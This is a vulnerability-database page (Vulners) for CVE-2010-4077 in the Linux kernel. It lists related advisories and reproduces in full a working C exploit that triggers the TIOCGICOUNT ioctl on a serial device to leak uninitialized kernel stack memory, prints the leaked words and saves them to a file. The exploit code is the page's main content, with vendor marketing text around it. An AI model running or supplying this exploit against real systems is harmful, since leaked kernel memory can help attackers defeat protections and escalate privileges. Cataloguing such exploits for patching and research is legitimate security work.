Vulners
Lucene search
Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak
| Reporter | Title | Published | Views | Family All 113 |
|---|---|---|---|---|
 | Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit | 15 Mar 201100:00 | – | zdt |
 | CVE-2010-4077 | 29 Nov 201015:00 | – | cve |
 | CVE-2010-4077 | 29 Nov 201015:00 | – | cvelist |
 | kernel security and bug fix update | 12 Feb 201100:00 | – | oraclelinux |
 | EUVD-2010-4053 | 7 Oct 202500:30 | – | euvd |
 | Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak | 14 Mar 201100:00 | – | exploitpack |
 | [SECURITY] Fedora 14 Update: kernel-2.6.35.9-64.fc14 | 5 Dec 201000:42 | – | fedora |
| [SECURITY] Fedora 13 Update: kernel-2.6.34.7-63.fc13 | 7 Dec 201020:07 | – | fedora |
 | Fedora 14 : kernel-2.6.35.9-64.fc14 (2010-18493) | 6 Dec 201000:00 | – | nessus |
| Fedora 13 : kernel-2.6.34.7-63.fc13 (2010-18506) | 8 Dec 201000:00 | – | nessus |
10
/* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
* ================================================
* Information leak exploit for CVE-2010-4077 which
* leaks kernel stack space back to userland due to
* uninitialized struct member "reserved" in struct
* serial_icounter_struct copied to userland. uses
* ioctl to trigger memory leak, dumps to file and
* displays to command line.
*
* -- prdelka
*
*/
#include <termios.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/serial.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char* argv[]) {
int fd, ret = 0, i;
struct serial_icounter_struct buffer;
printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
if(argc < 2){
printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
exit(-1);
};
memset(&buffer,0,sizeof(buffer));
if((fd = open(argv[1], O_RDONLY)) == -1){
printf("[ Couldn't open %s\n",argv[1]);
exit(-1);
}
if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){
printf("[ Problem with ioctl() request\n");
exit(-1);
}
close(fd);
for(i=0;i<=9;i++){
printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);
};
if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){
printf("[ Can't open file to write memory out\n");
exit(-1);
}
for(i=0;i<=9;i++){
ret += write(fd,&buffer.reserved[i],sizeof(int));
}
close(fd);
printf("[ Written %d leaked bytes to ./leak\n",ret);
exit(0);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Mar 2011 00:00Current
7High risk
Vulners AI Score7
CVSS 21.9
EPSS0.00482